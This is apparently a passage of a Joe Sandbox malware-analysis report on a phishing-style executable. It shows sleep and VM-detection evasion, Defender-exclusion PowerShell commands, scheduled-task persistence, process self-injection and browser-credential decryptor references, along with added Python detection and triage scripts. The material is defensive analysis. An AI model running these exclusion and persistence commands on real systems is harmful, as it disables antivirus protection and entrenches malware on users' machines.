                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598402
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598183
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 598078
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597953
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597844
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597731
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597582
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597453
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597344
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597233
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597125
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 597016
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596906
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596797
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596688
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596563
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596344
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596219
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 596110
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595985
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595860
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595735
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595610
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595485
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595326
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 595206
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594746
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594641
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594516
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594406
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594297
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594187
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 594078
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 593969
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 593839
                Source: e-dekont_html.exe, 00000000.00000002.1778649683.0000000008C5C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                Source: e-dekont_html.exe, 00000008.00000002.4158801476.0000000000F56000.00000004.00000020.00020000.00000000.sdmp, fahKSvwo.exe, 0000000D.00000002.4160104239.0000000001678000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Memory allocated: page read and write | page guard
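The thread-delay and memory-string entries above are the evidence behind the report's "Contains long sleeps (>= 3 min)" and "Yara detected AntiVM3" signatures. Two details are worth pulling out when triaging them: the value 922337203685477 is Int64.MaxValue 100-ns ticks expressed in milliseconds, i.e. an unbounded wait rather than a real duration, and the remaining values shrink by roughly 110 ms from call to call, which means the process recomputes the remaining wait and re-issues the sleep, so shortening any single call does not defeat the delay. The following Python is an added triage example and not part of the Joe Sandbox report; SAMPLE_LINES is a constructed subset of the entries above, and the "Source: <src> | <detail>" text layout, the regexes and the hypervisor keyword list are assumptions.

```python
"""Triage of sleep-based and hypervisor-artifact evasion from Joe Sandbox behaviour lines.

Added example, not part of the original report. SAMPLE_LINES is a constructed
subset of the report's own entries; the "Source: <src> | <detail>" layout is an
assumption about how the report is stored as text.
"""
import re
from collections import defaultdict

SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596656",
    r"Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596547",
    r"Source: C:\Users\user\Desktop\e-dekont_html.exe | Thread delayed: delay time: 596437",
    r"Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 600000",
    r"Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599875",
    r"Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Thread delayed: delay time: 599766",
    r"Source: e-dekont_html.exe, 00000000.00000002.1778649683.0000000008C5C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}",
    r"Source: fahKSvwo.exe, 0000000D.00000002.4160104239.0000000001678000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
]

DELAY_RE = re.compile(r"^Source: (?P<src>.+?) \| Thread delayed: delay time: (?P<ms>\d+)$")
MEMSTR_RE = re.compile(r"^Source: (?P<src>.+?) \| Binary or memory string: (?P<s>.+)$")

LONG_SLEEP_MS = 3 * 60 * 1000  # the report's own "long sleeps (>= 3 min)" threshold
# Int64.MaxValue 100-ns ticks converted to milliseconds (9223372036854775807 // 10000):
# the largest relative timeout a 64-bit timer can express, i.e. an unbounded wait.
INFINITE_SENTINEL_MS = 922337203685477
VM_MARKERS = ("vmware", "hyper-v", "virtualbox", "vbox", "qemu", "xen")  # assumed keyword list


def parse_delays(lines):
    """{process: [delay_ms, ...]} in report order."""
    delays = defaultdict(list)
    for line in lines:
        m = DELAY_RE.match(line.strip())
        if m:
            delays[m.group("src")].append(int(m.group("ms")))
    return dict(delays)


def countdown_step_ms(samples):
    """Median decrement between consecutive samples, or None with fewer than two steps.

    A steady decrement (about 110 ms here) means the process recomputes the
    remaining wait and re-issues the sleep, so shortening one call does not
    defeat the delay; the whole deadline has to be faked.
    """
    steps = [a - b for a, b in zip(samples, samples[1:]) if a > b]
    if len(steps) < 2:
        return None
    steps.sort()
    return steps[len(steps) // 2]


def vm_artifacts(lines):
    """(source, string) pairs whose memory string names a hypervisor vendor."""
    return [
        (m.group("src"), m.group("s"))
        for m in (MEMSTR_RE.match(line.strip()) for line in lines)
        if m and any(k in m.group("s").lower() for k in VM_MARKERS)
    ]


def triage(lines):
    """Per-process sleep-evasion summary."""
    summary = {}
    for proc, samples in parse_delays(lines).items():
        finite = [s for s in samples if s != INFINITE_SENTINEL_MS]
        summary[proc] = {
            "count": len(samples),
            "max_finite_ms": max(finite, default=0),
            "long_sleep": any(s >= LONG_SLEEP_MS for s in finite),
            "infinite_sentinel": INFINITE_SENTINEL_MS in samples,
            "countdown_step_ms": countdown_step_ms(finite),
        }
    return summary


if __name__ == "__main__":
    for proc, info in triage(SAMPLE_LINES).items():
        print(proc, info)
    for src, s in vm_artifacts(SAMPLE_LINES):
        print("hypervisor artifact in", src, "->", s)
```

Run against the full report rather than the sample, the countdown step for both binaries stays near 110 ms across hundreds of calls, which is the practical argument for sandboxes to fake the clock (GetTickCount, QueryPerformanceCounter, system time) rather than only patching individual sleep calls, and for detonation timeouts of well over the 10 minutes (600000 ms) the dropped copy starts from.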

                HIPS / PFW / Operating System Protection Evasion

                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, COVID19.cs | Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.e-dekont_html.exe.3cdb750.3.raw.unpack, FFDecryptor.cs | Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Memory written: C:\Users\user\Desktop\e-dekont_html.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Memory written: C:\Users\user\AppData\Roaming\fahKSvwo.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp8A49.tmp"
                Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Process created: C:\Users\user\AppData\Roaming\fahKSvwo.exe "C:\Users\user\AppData\Roaming\fahKSvwo.exe"
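Read together, the process-creation and memory-write entries above describe one defence-evasion chain: a 32-bit (SysWOW64) PowerShell adds Defender path exclusions for both the dropper and the persisted copy in %APPDATA%, schtasks imports a task definition from a throwaway .tmp file in %TEMP% (the "Scheduled temp file as task from temp location" Sigma hit), and each binary spawns a child from its own image and then writes an MZ header at the child's 0x400000 image base, which is the self-injection behind the "Injects a PE file into a foreign processes" signature. The Python below is an added detection example and not part of the Joe Sandbox report: it applies those three checks to constructed copies of the entries above and maps each hit to its ATT&CK technique. The "Source: <parent> | <detail>" text layout, the regexes, the temp-directory list and the finding fields are assumptions.

```python
"""Detection of the Defender-exclusion / scheduled-task / self-injection chain above.

Added example, not part of the Joe Sandbox report. SAMPLE_EVENTS are constructed
copies of the report's process-creation and memory-write lines; the
"Source: <parent> | <detail>" layout and the finding fields are assumptions.
"""
import re

SAMPLE_EVENTS = [
    r'Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"',
    r'Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fahKSvwo.exe"',
    r'Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fahKSvwo" /XML "C:\Users\user\AppData\Local\Temp\tmp7653.tmp"',
    r'Source: C:\Users\user\Desktop\e-dekont_html.exe | Process created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"',
    r'Source: C:\Users\user\Desktop\e-dekont_html.exe | Memory written: C:\Users\user\Desktop\e-dekont_html.exe base: 400000 value starts with: 4D5A',
    r'Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Process created: C:\Users\user\AppData\Roaming\fahKSvwo.exe "C:\Users\user\AppData\Roaming\fahKSvwo.exe"',
    r'Source: C:\Users\user\AppData\Roaming\fahKSvwo.exe | Memory written: C:\Users\user\AppData\Roaming\fahKSvwo.exe base: 400000 value starts with: 4D5A',
]

PROC_RE = re.compile(r'^Source: (?P<parent>.+?) \| Process created: (?P<image>\S+) (?P<cmdline>.*)$')
MEM_RE = re.compile(r'^Source: (?P<writer>.+?) \| Memory written: (?P<target>.+?) base: (?P<base>[0-9a-f]+) value starts with: (?P<magic>[0-9a-f]+)$', re.I)
EXCL_RE = re.compile(r'Add-MpPreference\s+-Exclusion(?P<kind>Path|Process|Extension)\s+"?(?P<value>[^"]+)', re.I)
TASK_RE = re.compile(r'/Create\b.*?/TN\s+"(?P<name>[^"]+)".*?/XML\s+"(?P<xml>[^"]+)"', re.I)
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")  # assumed list of throwaway locations


def analyze(lines):
    """Return a list of findings; each is {"technique", "process", "detail"}."""
    findings, self_spawn, mz_targets = [], set(), set()
    for raw in lines:
        line = raw.strip()
        m = PROC_RE.match(line)
        if m:
            parent, image, cmd = m.group("parent"), m.group("image"), m.group("cmdline")
            low_image = image.lower()
            excl = EXCL_RE.search(cmd)
            if excl and low_image.endswith("powershell.exe"):
                findings.append({"technique": "T1562.001", "process": parent,
                                 "detail": f"Defender Exclusion{excl.group('kind')} added for {excl.group('value')}"})
            task = TASK_RE.search(cmd)
            if task and low_image.endswith("schtasks.exe") and any(d in task.group("xml").lower() for d in TEMP_DIRS):
                findings.append({"technique": "T1053.005", "process": parent,
                                 "detail": f"task {task.group('name')} imported from temp XML {task.group('xml')}"})
            if low_image == parent.lower():
                self_spawn.add(parent.lower())
            continue
        m = MEM_RE.match(line)
        if m and m.group("magic").upper().startswith("4D5A") and int(m.group("base"), 16) == 0x400000:
            mz_targets.add(m.group("target").lower())
    # A parent that spawns its own image and then writes an MZ header at the child's
    # image base is replacing the child's mapped executable: process hollowing.
    for proc in sorted(self_spawn & mz_targets):
        findings.append({"technique": "T1055.012", "process": proc,
                         "detail": "MZ header written at 0x400000 into a child running the same image"})
    for proc in sorted(self_spawn - mz_targets):
        findings.append({"technique": "T1055", "process": proc,
                         "detail": "child spawned from own image without an observed PE write"})
    return findings


def techniques(lines):
    """Distinct ATT&CK technique IDs, sorted, for a quick verdict."""
    return sorted({f["technique"] for f in analyze(lines)})


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f["technique"], f["process"], "-", f["detail"])
```

On a live host the same two persistence and evasion artefacts are confirmed with `Get-MpPreference | Select-Object -ExpandProperty ExclusionPath` and `schtasks /Query /TN "Updates\fahKSvwo" /XML`, and removed with `Remove-MpPreference -ExclusionPath <path>` and `schtasks /Delete /TN "Updates\fahKSvwo" /F`; note that the exclusion covers the %APPDATA% copy the task launches, so deleting only the task leaves a blind spot in place.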
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Users\user\Desktop\e-dekont_html.exe VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\e-dekont_html.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
